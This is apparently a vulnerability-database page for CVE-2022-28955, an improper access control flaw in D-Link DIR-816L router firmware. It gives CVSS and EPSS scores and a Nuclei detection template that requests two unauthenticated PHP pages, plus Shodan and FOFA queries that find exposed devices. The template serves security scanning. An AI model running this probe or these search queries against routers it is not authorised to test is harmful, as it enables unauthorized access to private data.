Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-28955
HistoryAug 14, 2022 - 2:56 p.m.

D-Link DIR-816L - Improper Access Control

2022-08-1414:56:22
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.025 Low

EPSS

Percentile

90.3%

D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2022-28955

info:
  name: D-Link DIR-816L - Improper Access Control
  author: arafatansari
  severity: high
  description: |
    D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected router.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the access control issue.
  reference:
    - https://github.com/shijin0925/IOT/blob/master/DIR816/1.md
    - https://www.dlink.com/en/security-bulletin/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28955
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-28955
    cwe-id: CWE-287
    epss-score: 0.02487
    epss-percentile: 0.89836
    cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: dlink
    product: dir-816l_firmware
    shodan-query:
      - http.html:"DIR-816L"
      - http.html:"dir-816l"
    fofa-query: body="dir-816l"
  tags: cve2022,cve,dlink,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/category_view.php"
      - "{{BaseURL}}/folder_view.php"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<title>SharePort Web Access</title>'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206be3e4f53fc0a1ea7b1754a1a7c6af18abaafee0f2e7cf85dfccc646a15e69e902210085f74082cdce90df9ab472d73277594d59daea89850ac110157ae0a968736c6c:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.025 Low

EPSS

Percentile

90.3%

Related for NUCLEI:CVE-2022-28955